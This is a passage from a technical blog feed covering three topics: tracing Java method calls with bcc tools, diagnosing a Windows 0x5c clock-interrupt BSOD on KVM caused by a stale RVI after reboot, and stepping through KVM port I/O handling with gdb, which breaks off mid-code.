<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/systemtap-tapset-openjdk9/systemtap-tapset# grep -A 10 'probe.*method_entry' *.stp
hotspot-1.9.0.stp:probe hotspot.method_entry =
hotspot-1.9.0.stp- process("/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/").mark("method__entry"),
hotspot-1.9.0.stp- process("/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/").mark("method__entry")
hotspot-1.9.0.stp-{
hotspot-1.9.0.stp- name = "method_entry";
hotspot-1.9.0.stp- thread_id = $arg1;
hotspot-1.9.0.stp- class = user_string_n($arg2, $arg3);
hotspot-1.9.0.stp- method = user_string_n($arg4, $arg5);
hotspot-1.9.0.stp- sig = user_string_n($arg6, $arg7);
hotspot-1.9.0.stp- probestr = sprintf("%s(thread_id=%d,class='%s',method='%s',sig='%s')",
hotspot-1.9.0.stp- name, thread_id, class, method, sig);
root@ubuntu1604:~/systemtap-tapset-openjdk9/systemtap-tapset# grep -A 10 'probe.*method_return' *.stp
hotspot-1.9.0.stp:probe hotspot.method_return =
hotspot-1.9.0.stp- process("/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/").mark("method__return"),
hotspot-1.9.0.stp- process("/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/").mark("method__return")
hotspot-1.9.0.stp-{
hotspot-1.9.0.stp- name = "method_return";
hotspot-1.9.0.stp- thread_id = $arg1;
hotspot-1.9.0.stp- class = user_string_n($arg2, $arg3);
hotspot-1.9.0.stp- method = user_string_n($arg4, $arg5);
hotspot-1.9.0.stp- sig = user_string_n($arg6, $arg7);
hotspot-1.9.0.stp- probestr = sprintf("%s(thread_id=%d,class='%s',method='%s',sig='%s')",
hotspot-1.9.0.stp- name, thread_id, class, method, sig);
</code></pre></div></div>
<p>We can see that arguments 2 and 4 are the class and method respectively.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./argdist -p 33840 -C 'u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4' -T 5
[19:09:19]
u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
COUNT EVENT
[19:09:20]
u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
COUNT EVENT
[19:09:21]
u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
COUNT EVENT
[19:09:22]
u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
COUNT EVENT
1 arg4 = getBufIfOpen
4516 arg4 = isPrime
4516 arg4 = isSimplePrime
891794 arg4 = isDivisible
[19:09:23]
u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
COUNT EVENT
2309 arg4 = isPrime
2309 arg4 = isSimplePrime
1036648 arg4 = isDivisible
[19:09:24]
u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
COUNT EVENT
1768 arg4 = isPrime
1768 arg4 = isSimplePrime
1039152 arg4 = isDivisible
[19:09:25]
u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
COUNT EVENT
1467 arg4 = isPrime
1467 arg4 = isSimplePrime
1038429 arg4 = isDivisible
[19:09:26]
u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry():char*:arg4
COUNT EVENT
1325 arg4 = isPrime
1325 arg4 = isSimplePrime
1038159 arg4 = isDivisible
</code></pre></div></div>
<p>Most of the time is spent calling isDivisible.</p>
<p>Restart slowy/App with inlining disabled and extended DTrace probes enabled:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:~/linux-tracing-workshop# /usr/lib/jvm/java-9-openjdk-amd64/bin/java -XX:-Inline -XX:+ExtendedDTraceProbes slowy/App
</code></pre></div></div>
<p>Trace method entry and return:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./trace -p 33918 'u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__entry "%s.%s", arg2, arg4' 'u:/usr/lib/jvm/java-9-openjdk-amd64/jre/lib/amd64/server/libjvm.so:method__return "%s.%s", arg2, arg4'
33918 33919 java method__entry slowy/App.isDivisible
33918 33919 java method__entry slowy/App.isDivisible
33918 33919 java method__entry slowy/App.isPrime
33918 33919 java method__entry slowy/App.isSimplePrime
33918 33919 java method__entry slowy/App.isDivisible
33918 33919 java method__entry slowy/App.isPrime
33918 33919 java method__entry slowy/App.isSimplePrime
33918 33919 java method__entry slowy/App.isDivisible
</code></pre></div></div>
<p>There are a large number of method entries and returns (the return events scrolled by before they could be shown above).</p>
Analysis of a 0x5c BSOD caused by timer interrupt in KVM when VMs reboot2017-11-27T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/11/27/clock-init-failed-bsod
<ul>
<li>
<p><a href="#0">Issue Description</a></p>
</li>
<li>
<p><a href="#1">Analysis in Windows kernel side</a></p>
</li>
<li>
<p><a href="#2">Analysis in KVM side</a></p>
</li>
<li>
<p><a href="#3">Reference</a></p>
</li>
</ul>
<h2 id="0">Issue Description</h2>
<p>Recently I was assigned a BSOD caused by rebooting a Windows guest on KVM, and I made a deep analysis of it. Though I’m not 100% satisfied with the final conclusion, it still makes sense and is a good explanation. I got a lot of help from Wei Wang of Intel, Vadim Rozenfeld of Red Hat, and Paolo Bonzini of Red Hat; many thanks to them.</p>
<p>The issue itself is quite straightforward. It doesn’t cause a BSOD every time, but after rebooting the Windows guest several times we almost always get a BSOD with code 0x5c (0x10b, 3, 0, 0). Here is the summary information.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> FOLLOWUP_IP:
nt!InitBootProcessor+12a
fffff800`01c01d0a 413ac6 cmp al,r14b
SYMBOL_STACK_INDEX: 6
SYMBOL_NAME: nt!InitBootProcessor+12a
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: nt
IMAGE_NAME: ntkrnlmp.exe
DEBUG_FLR_IMAGE_TIMESTAMP: 59b946d1
IMAGE_VERSION: 6.1.7601.23915
FAILURE_BUCKET_ID: X64_0x5C_HAL_CLOCK_INTERRUPT_NOT_RECEIVED_nt!InitBootProcessor+12a
BUCKET_ID: X64_0x5C_HAL_CLOCK_INTERRUPT_NOT_RECEIVED_nt!InitBootProcessor+12a
ANALYSIS_SOURCE: KM
FAILURE_ID_HASH_STRING: km:x64_0x5c_hal_clock_interrupt_not_received_nt!initbootprocessor+12a
FAILURE_ID_HASH: {829a944d-7639-05f1-a55f-2677354a890e}
kd> kb
# RetAddr : Args to Child : Call Site
00 fffff800`017b9662 : 00000000`0000010b fffff800`01854cc0 00000000`00000065 fffff800`01705514 : nt!DbgBreakPointWithStatus
01 fffff800`017ba44e : 00000000`00000003 00000000`00000000 fffff800`01705d70 00000000`0000005c : nt!KiBugCheckDebugBreak+0x12
02 fffff800`016c8f04 : 00000000`00000001 fffff800`0161e0b3 00000000`00002a43 00000000`00000000 : nt!KeBugCheck2+0x71e
03 fffff800`0161e2b4 : 00000000`0000005c 00000000`0000010b 00000000`00000003 00000000`00000000 : nt!KeBugCheckEx+0x104
04 fffff800`016442a3 : 00000000`00000001 fffff800`0080e4b0 fffff800`0080e4b0 00000000`00000001 : hal!HalpInitializeClock+0x1c9
05 fffff800`01c01d0a : fffff800`0080e4b0 fffff800`0080e4b0 fffff800`013d8780 fffff800`016c0c86 : hal!HalpInitSystem+0x29b
06 fffff800`0191cfa3 : fffff800`00000000 fffff800`01846e80 fffff800`013d8780 00000000`00000001 : nt!InitBootProcessor+0x12a
07 fffff800`0190a8a6 : 00000000`00000230 fffff800`02b28588 fffff800`013d8b30 00000001`00000000 : nt!KiInitializeKernel+0x833
08 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemStartup+0x196
</code></pre></div></div>
<p>It is obvious that the function ‘HalpInitializeClock’ failed and caused a bugcheck. Disassembling it, it is easy to see that the bugcheck happens when it calls ‘HalpWaitForPhase0ClockTick’ and that function returns failure.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kd> uf HalpInitializeClock
hal!HalpInitializeClock:
fffff800`01bff0ec 4889742408 mov qword ptr [rsp+8],rsi
fffff800`01bff0f1 9c pushfq
fffff800`01bff0f2 4883ec50 sub rsp,50h
fffff800`01bff0f6 488b0503600100 mov rax,qword ptr [hal!_security_cookie (fffff800`01c15100)]
fffff800`01bff0fd 4833c4 xor rax,rsp
fffff800`01bff100 4889442440 mov qword ptr [rsp+40h],rax
fffff800`01bff105 8b0dc1a20100 mov ecx,dword ptr [hal!HalpClockSource (fffff800`01c193cc)]
...
hal!HalpInitializeClock+0x19c:
fffff800`01bff287 b9b80b0000 mov ecx,0BB8h
fffff800`01bff28c e8e3fdffff call hal!HalpWaitForPhase0ClockTick (fffff800`01bff074)
fffff800`01bff291 84c0 test al,al
fffff800`01bff293 7520 jne hal!HalpInitializeClock+0x1ca (fffff800`01bff2b5)
hal!HalpInitializeClock+0x1aa:
fffff800`01bff295 4c630530a10100 movsxd r8,dword ptr [hal!HalpClockSource (fffff800`01c193cc)]
fffff800`01bff29c 488364242000 and qword ptr [rsp+20h],0
fffff800`01bff2a2 4533c9 xor r9d,r9d
fffff800`01bff2a5 418d495c lea ecx,[r9+5Ch]
fffff800`01bff2a9 ba0b010000 mov edx,10Bh
fffff800`01bff2ae ff153c000100 call qword ptr [hal!_imp_KeBugCheckEx (fffff800`01c0f2f0)]
fffff800`01bff2b4 cc int 3
...
fffff800`01bff2da c3 ret
</code></pre></div></div>
<p>Just paste “HalpWaitForPhase0ClockTick” into Google and you will find this bugzilla:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> https://bugzilla.redhat.com/show_bug.cgi?id=1387054
</code></pre></div></div>
<p>It looks like the same issue, differing only in the bugcheck’s second parameter, which is ‘1’ in the bugzilla but ‘3’ in our BSOD. So I found the patch:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> https://github.com/torvalds/linux/commit/4114c27d450bef228be9c7b0c40a888e18a3a636#diff-3e935e2004c0c48a7a669085ee75f1b1
</code></pre></div></div>
<p>I applied the patch, rebooted the guest several times, and saw no BSOD. The whole process took me ten minutes, and life seemed OK again. Over? Of course not: I was curious about this issue and wanted to know what lies under the surface of this BSOD.</p>
<h2 id="1">Analysis in Windows kernel side</h2>
<p>Let’s look at the backtrace in WinDbg in more detail.</p>
<p>If you have some background on Windows startup, you know this backtrace shows that the BSOD happened during Phase 0 initialization. In this phase only one processor, called the boot processor, gets initialized. In the backtrace we can see Windows initializing the clock. The BSOD summary contains “x64_0x5c_hal_clock_interrupt_not_received”, which pinpoints the issue: Windows did not receive clock interrupts.</p>
<p>Let’s look at the disassembly of “HalpWaitForPhase0ClockTick”. This is the main logic of the function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> char __fastcall HalpWaitForPhase0ClockTick(unsigned int a1)
{
unsigned __int64 v1; // rbx
v1 = ((unsigned __int64)((HalpProc0TSCHz * (unsigned __int64)a1 * (unsigned __int128)0x624DD2F1A9FBE77ui64 >> 64)
+ ((unsigned __int64)(HalpProc0TSCHz * a1
- (HalpProc0TSCHz
* (unsigned __int64)a1
* (unsigned __int128)0x624DD2F1A9FBE77ui64 >> 64)) >> 1)) >> 9)
+ __rdtsc();
HalpProcessorFence();
if ( HalpPhase0ClockInterruptCount )
return 1;
while ( __rdtsc() <= v1 )
{
if ( HalpPhase0ClockInterruptCount )
return 1;
}
return 0;
}
char HalpHpetClockInterruptStub()
{
++HalpPhase0ClockInterruptCount;
return 1;
}
</code></pre></div></div>
<p>Here ‘HalpPhase0ClockInterruptCount’ counts clock interrupts; it is incremented on every timer interrupt. The function simply waits for an interrupt to arrive before the TSC reaches v1 (per the Red Hat bugzilla, about 3 seconds). From Vadim Rozenfeld I learned that this is a common technique in the Windows kernel: the HAL initialization process waits for a period of time considered long enough for an initialization action to complete, in this case the clock. So the story on the Windows side is clear: when the guest initializes the clock, it waits for a while (3s) for a timer interrupt to be observed (via HalpPhase0ClockInterruptCount). No interrupt arrives, so Windows concludes the clock is not in a working state and triggers this BSOD.</p>
<h2 id="2">Analysis in KVM side</h2>
<p>Now that we know the story on the Windows side, let’s look at the KVM side.
Though I’m familiar with CPU/memory/device virtualization in the qemu/kvm stack, to be honest I’m not familiar with interrupt virtualization. Let’s look at the patch <a href="https://github.com/torvalds/linux/commit/4114c27d450bef228be9c7b0c40a888e18a3a636#diff-3e935e2004c0c48a7a669085ee75f1b1">KVM: x86: reset RVI upon system reset</a>; the commit message says:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> "A bug was reported as follows: when running Windows 7 32-bit guests on qemu-kvm,
sometimes the guests run into blue screen during reboot. The problem was that a
guest's RVI was not cleared when it rebooted. This patch has fixed the problem."
</code></pre></div></div>
<p>This patch clears the RVI on reboot. First let’s look at the reboot path.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kvm_vcpu_ioctl(CPU(s->cpu), KVM_SET_LAPIC, &kapic);
-->kvm_vcpu_ioctl_set_lapic
-->kvm_apic_post_state_restore
-->vmx_hwapic_irr_update
-->vmx_set_rvi
</code></pre></div></div>
<p>The latter two functions were added by the patch.
Here is a brief introduction to the registers involved:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>IRR: Interrupt Request Register. If the nth bit is set, the LAPIC has received interrupt n but has not yet delivered it to the CPU.
RVI: Requesting Virtual Interrupt, the low byte of the guest interrupt status. The processor
treats this value as the vector of the highest-priority virtual interrupt that is requesting service.
SVI: Servicing Virtual Interrupt, the high byte of the guest interrupt status. The processor
treats this value as the vector of the highest-priority virtual interrupt that is in service.
EOI: End of Interrupt. Software writes this register at the end of an interrupt handler to tell the (virtual) APIC it may deliver the next interrupt.
ISR: In-Service Register. If the nth bit is set, the CPU is servicing interrupt n but has not yet completed it.
</code></pre></div></div>
<p>RVI and SVI exist only in the virtual APIC; they characterize part of the guest’s virtual-APIC state and
do not correspond to any processor or APIC registers.
The general flow is: an interrupt is first marked in the IRR and reflected into the RVI; the guest then services it, setting the ISR; when the handler finishes, it writes the EOI register to tell the virtual APIC it may deliver the next interrupt.</p>
<p>In this BSOD case, the RVI was not cleared across reboot, and the stale vector had a higher priority than the timer interrupt. Since this happens early in Windows initialization, there may be no interrupt handler registered for the stale RVI vector, so nothing can service it. Because the stale vector outranks the timer interrupt and the in-service state in the virtual APIC never gets cleared, the virtual APIC will not deliver the timer interrupt, and Windows hits the BSOD.</p>
<h2 id="3">Reference</h2>
<ol>
<li>
<p>SDM 24.4.2</p>
</li>
<li>
<p>Mctrain’s Blog: <a href="http://ytliu.info/blog/2016/12/24/zhong-duan-chu-li-de-na-xie-shi-er/">中断处理的那些事儿</a></p>
</li>
</ol>
PIO handling in QEMU-KVM2017-07-10T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/07/10/kvm-pio
<ul>
<li>
<p><a href="#0">0. Preparation</a></p>
</li>
<li>
<p><a href="#1">1. Registration of I/O ports in KVM</a></p>
</li>
<li>
<p><a href="#2">2. Handling flow of PIO out</a></p>
</li>
<li>
<p><a href="#3">3. Handling flow of PIO in</a></p>
</li>
<li>
<p><a href="#4">4. References</a></p>
</li>
</ul>
<p>We all know that in a kvm/qemu virtual machine, reading from or writing to an I/O port traps into KVM (for the vast majority of ports). But what exactly does that process look like, and how do the guest, kvm, and qemu cooperate to complete this emulation? This article explores that question by debugging KVM to uncover what happens underneath.</p>
<h2 id="0">0. Preparation</h2>
<p>To do good work, one must first sharpen one's tools. To understand how KVM intercepts and handles PIO, we first need to debug KVM, which requires a two-machine kernel debugging setup; there are many examples online. Note that on 4.x kernels, clearing the write protection on the kernel text is somewhat problematic, so this article uses a 3.x kernel, specifically 3.10.105. Our environment is therefore a target running the 3.10.105 kernel; the debugger machine can be anything.</p>
<p>If we debugged kvm/qemu directly, a full environment would produce a very large number of VM exits that interfere with the analysis. Here we only need an example that uses the KVM API to build the simplest possible virtual machine and executes in/out instructions inside it. There are many such examples online, for instance <a href="http://soulxu.github.io/blog/2014/08/11/use-kvm-api-write-emulator/">使用KVM API实现Emulator
Demo</a> and
<a href="http://www.linuxjournal.com/magazine/linux-kvm-learning-tool">Linux KVM as a Learning
Tool</a>.</p>
<p>Here we use the first example. First, clone the code from</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://github.com/soulxu/kvmsample
</code></pre></div></div>
<p>and run make directly. If the kvm module is loaded you should see some output. The usage of the KVM API is not covered here; read either of the two articles above carefully. Although qemu is far more complex, it runs in essentially the same way. The guest in this example writes data to an I/O port.</p>
<h2 id="1">1. Registration of I/O ports in KVM</h2>
<p>First we need to be clear on one point: an I/O port is something the CPU uses to exchange data with peripherals, and not every CPU has them. From the virtual machine's point of view there is no real I/O port behind the interface, so port accesses must be caught via VM exits.</p>
<p>Whether I/O instructions are intercepted is decided by two fields in the VM-Execution controls of the VMCS.
See Intel SDM 24.6.2:</p>
<p><img src="/assets/img/pio/1.png" alt="" /></p>
<p>We can see that if the "Use I/O bitmaps" bit is set, "Unconditional I/O exiting" has no effect. If a bit in the I/O bitmap is set to 1, accessing the corresponding port causes a VM exit; otherwise the guest can access it directly.
The addresses of the I/O bitmaps are stored in the I/O-Bitmap Addresses field of the VMCS. In fact there are two I/O bitmaps, which we call A and B.
Looking at the SDM again:</p>
<p><img src="/assets/img/pio/2.png" alt="" /></p>
<p>Each bitmap is 4 KB, i.e. one page. Bitmap A covers ports 0000H through 7FFFH (4*1024*8 bits), and the second bitmap covers ports 8000H through FFFFH.</p>
<p>Good, we now understand I/O ports in theory; let's look at the KVM code.</p>
<p>First, in arch/x86/kvm/vmx.c, two global variables hold the addresses of bitmaps A and B.
In vmx_init each pointer is allocated one page of memory and all bits are set to 1; then bit 0x80 of bitmap A is cleared, meaning guest accesses to port 0x80 do not cause VM exits.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static unsigned long *vmx_io_bitmap_a;
static unsigned long *vmx_io_bitmap_b;
static int __init vmx_init(void)
{
vmx_io_bitmap_a = (unsigned long *)__get_free_page(GFP_KERNEL);
vmx_io_bitmap_b = (unsigned long *)__get_free_page(GFP_KERNEL);
/*
* Allow direct access to the PC debug port (it is often used for I/O
* delays, but the vmexits simply slow things down).
*/
memset(vmx_io_bitmap_a, 0xff, PAGE_SIZE);
clear_bit(0x80, vmx_io_bitmap_a);
memset(vmx_io_bitmap_b, 0xff, PAGE_SIZE);
...
}
</code></pre></div></div>
<p>In the same file we see that when a vcpu is set up, the addresses of bitmap A and B are written into the VMCS, which establishes the interception of I/O port accesses.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int vmx_vcpu_setup(struct vcpu_vmx *vmx)
{
/* I/O */
vmcs_write64(IO_BITMAP_A, __pa(vmx_io_bitmap_a));
vmcs_write64(IO_BITMAP_B, __pa(vmx_io_bitmap_b));
return 0;
}
</code></pre></div></div>
<h2 id="2">2. Handling flow of out in PIO</h2>
<p>In this section we trace how kvm handles the out instruction. First, change the test.S from the previous section to issue a single out.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.globl _start
.code16
_start:
xorw %ax, %ax
mov $0x0a,%al
out %ax, $0x10
inc %ax
hlt
</code></pre></div></div>
<p>After the guest causes a vm exit, kvm dispatches to a handler according to the exit reason, also in vmx.c:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int (*const kvm_vmx_exit_handlers[])(struct kvm_vcpu *vcpu) = {
[EXIT_REASON_EXCEPTION_NMI] = handle_exception,
[EXIT_REASON_EXTERNAL_INTERRUPT] = handle_external_interrupt,
[EXIT_REASON_TRIPLE_FAULT] = handle_triple_fault,
[EXIT_REASON_NMI_WINDOW] = handle_nmi_window,
[EXIT_REASON_IO_INSTRUCTION] = handle_io,
...
}
</code></pre></div></div>
<p>Correspondingly, the callback handling I/O is handle_io. On the target we run:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@ubuntu:/home/test# echo g >/proc/sysrq-trigger
</code></pre></div></div>
<p>gdb on the debugger machine then breaks in; set a breakpoint on handle_io:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) b handle_io
Breakpoint 1 at 0xffffffff81037dca: file arch/x86/kvm/vmx.c, line 4816.
(gdb) c
</code></pre></div></div>
<p>Next, start kvmsample on the target under gdb and set a breakpoint at line 84 of main.c.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>test@ubuntu:~/kvmsample$ gdb ./kvmsample
...
Reading symbols from ./kvmsample...done.
(gdb) b ma
main main.c malloc malloc@plt
(gdb) b main.c:84
Breakpoint 1 at 0x400cac: file main.c, line 84.
</code></pre></div></div>
<p>Line 84 is exactly where the KVM_RUN ioctl returns.</p>
<p><img src="/assets/img/pio/3.png" alt="" /></p>
<p>Now run, and the debugger breaks in:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Thread 434 hit Breakpoint 1, handle_io (vcpu=0xffff8800ac528000)
at arch/x86/kvm/vmx.c:4816
4816 {
(gdb)
</code></pre></div></div>
<p>From the handle_io code we can see that it first reads exit information from the VMCS: whether the access is in or out, its size, the port number, and so on.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int handle_io(struct kvm_vcpu *vcpu)
{
unsigned long exit_qualification;
int size, in, string;
unsigned port;
exit_qualification = vmcs_readl(EXIT_QUALIFICATION);
string = (exit_qualification & 16) != 0;
in = (exit_qualification & 8) != 0;
++vcpu->stat.io_exits;
if (string || in)
return emulate_instruction(vcpu, 0) == EMULATE_DONE;
port = exit_qualification >> 16;
size = (exit_qualification & 7) + 1;
skip_emulated_instruction(vcpu);
return kvm_fast_pio_out(vcpu, size, port);
}
</code></pre></div></div>
<p>After skip_emulated_instruction advances the guest rip, kvm_fast_pio_out is called. There we first read the guest's rax, which holds the value written to the port — here 0xa.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kvm_fast_pio_out(struct kvm_vcpu *vcpu, int size, unsigned short port)
{
unsigned long val = kvm_register_read(vcpu, VCPU_REGS_RAX);
int ret = emulator_pio_out_emulated(&vcpu->arch.emulate_ctxt,
size, port, &val, 1);
/* do not return to emulator after return from userspace */
vcpu->arch.pio.count = 0;
return ret;
}
</code></pre></div></div>
<p>Compare with the data in gdb:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Thread 434 hit Breakpoint 1, handle_io (vcpu=0xffff8800ac528000)
at arch/x86/kvm/vmx.c:4816
4816 {
(gdb) n
4821 exit_qualification = vmcs_readl(EXIT_QUALIFICATION);
(gdb) n
4825 ++vcpu->stat.io_exits;
(gdb) n
4827 if (string || in)
(gdb) n
4832 skip_emulated_instruction(vcpu);
(gdb) n
[New Thread 3654]
4834 return kvm_fast_pio_out(vcpu, size, port);
(gdb) s
kvm_fast_pio_out (vcpu=0xffff8800ac528000, size=16, port=16)
at arch/x86/kvm/x86.c:5086
5086 {
(gdb) n
[New Thread 3656]
5087 unsigned long val = kvm_register_read(vcpu, VCPU_REGS_RAX);
(gdb) n
[New Thread 3657]
5088 int ret = emulator_pio_out_emulated(&vcpu->arch.emulate_ctxt,
(gdb) p /x val
$1 = 0xa
(gdb)
</code></pre></div></div>
<p>Further down we see that emulator_pio_out_emulated copies the value into vcpu->arch.pio_data and then calls emulator_pio_in_out.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int emulator_pio_out_emulated(struct x86_emulate_ctxt *ctxt,
int size, unsigned short port,
const void *val, unsigned int count)
{
struct kvm_vcpu *vcpu = emul_to_vcpu(ctxt);
memcpy(vcpu->arch.pio_data, val, size * count);
return emulator_pio_in_out(vcpu, size, port, (void *)val, count, false);
}
static int emulator_pio_in_out(struct kvm_vcpu *vcpu, int size,
unsigned short port, void *val,
unsigned int count, bool in)
{
trace_kvm_pio(!in, port, size, count);
vcpu->arch.pio.port = port;
vcpu->arch.pio.in = in;
vcpu->arch.pio.count = count;
vcpu->arch.pio.size = size;
if (!kernel_pio(vcpu, vcpu->arch.pio_data)) {
vcpu->arch.pio.count = 0;
return 1;
}
vcpu->run->exit_reason = KVM_EXIT_IO;
vcpu->run->io.direction = in ? KVM_EXIT_IO_IN : KVM_EXIT_IO_OUT;
vcpu->run->io.size = size;
vcpu->run->io.data_offset = KVM_PIO_PAGE_OFFSET * PAGE_SIZE;
vcpu->run->io.count = count;
vcpu->run->io.port = port;
return 0;
}
</code></pre></div></div>
<p>In the latter function we see vcpu->run->io.data_offset set to 4096. The value we wrote to the port was already memcpy'd into vcpu->arch.pio_data, and debugging reveals the trick: vcpu->arch.pio_data sits exactly one page after kvm_run. This can also be seen in kvm_vcpu_init.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>4405 vcpu->run->io.size = size;
(gdb) n
[New Thread 3667]
4406 vcpu->run->io.data_offset = KVM_PIO_PAGE_OFFSET * PAGE_SIZE;
(gdb) n
4407 vcpu->run->io.count = count;
(gdb) n
4408 vcpu->run->io.port = port;
(gdb) p count
$7 = 1
(gdb) n
4410 return 0;
(gdb) x /2b 0xffff88002a2a2000+0x1000
0xffff88002a2a3000: 0x0a 0x00
(gdb) p vcpu->run
$9 = (struct kvm_run *) 0xffff88002a2a2000
(gdb) p vcpu->arch.pio_data
$10 = (void *) 0xffff88002a2a3000
(gdb)
</code></pre></div></div>
<p>So vcpu->run->io holds the basic PIO information — size, port number, and so on — while the page after run, vcpu->arch.pio_data, holds the data actually written by out. Let the target continue, and we break back into the kvmsample program.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) p kvm->vcpus->kvm_run->io
$2 = {direction = 1 '\001', size = 2 '\002', port = 16, count = 1,
data_offset = 4096}
(gdb)
</code></pre></div></div>
<p>A quick word on kvm_run: it is the structure through which the vcpu communicates with the user-space program (typically qemu). User space obtains its size via the KVM_GET_VCPU_MMAP_SIZE ioctl and maps it into its address space.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) x /2b 0x7ffff7ff4000+0x1000
0x7ffff7ff5000: 10
</code></pre></div></div>
<p>Through gdb we can see that both the data the guest wrote and the port number can be read from user space. This sample program merely prints the data; qemu would look up the device behind the port and invoke the corresponding callback.</p>
<p>Overall, the out flow is very simple: the guest writes a port, traps into kvm, and kvm returns to user space for handling.</p>
<h2 id="3">3. Handling flow of in in PIO</h2>
<p>We said that both reads and writes of a port cause a vm exit, but a little thought shows out and in must differ: out only needs the guest to write a value, while in has to bring data back. So the flow should be: the guest issues an in, kvm handles it and returns to user space, which fills the data into the kvm_run structure; with the data in hand, kvm does a vm entry and the result of the in reaches the guest.</p>
<p>We make a small change to the sample program: in test.S we first read a value from port 0x10 — it will turn out to be 0xbeff — and then write it to port 0x10.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>test.S
# A test code for kvmsample
.globl _start
.code16
_start:
xorw %ax, %ax
mov $0x0a,%al
in $0x10,%ax
out %ax, $0x10
hlt
</code></pre></div></div>
<p>Modify main.c as follows:</p>
<p><img src="/assets/img/pio/5.png" alt="" /></p>
<p>When handling KVM_EXIT_IO we now distinguish in from out; for in we copy a 0xbeff across. The guest then writes this value back to port 0x10 with out.</p>
<p>The first execution of the in instruction still traps into kvm's handle_io, but this time takes the other branch:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Thread 486 hit Breakpoint 1, handle_io (vcpu=0xffff88011d428000)
at arch/x86/kvm/vmx.c:4816
4816 {
(gdb) n
4821 exit_qualification = vmcs_readl(EXIT_QUALIFICATION);
(gdb)
4825 ++vcpu->stat.io_exits;
(gdb)
4827 if (string || in)
(gdb)
4828 return emulate_instruction(vcpu, 0) == EMULATE_DONE;
(gdb) s
emulate_instruction (emulation_type=<optimized out>, vcpu=<optimized out>)
at /home/test/linux-3.10.105/arch/x86/include/asm/kvm_host.h:811
811 return x86_emulate_instruction(vcpu, 0, emulation_type, NULL, 0);
(gdb) s
</code></pre></div></div>
<p>x86_emulate_instruction is called; the two most important functions it invokes are x86_decode_insn and x86_emulate_insn.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int x86_emulate_instruction(struct kvm_vcpu *vcpu,
unsigned long cr2,
int emulation_type,
void *insn,
int insn_len)
{
int r;
struct x86_emulate_ctxt *ctxt = &vcpu->arch.emulate_ctxt;
bool writeback = true;
bool write_fault_to_spt = vcpu->arch.write_fault_to_shadow_pgtable;
/*
* Clear write_fault_to_shadow_pgtable here to ensure it is
* never reused.
*/
vcpu->arch.write_fault_to_shadow_pgtable = false;
kvm_clear_exception_queue(vcpu);
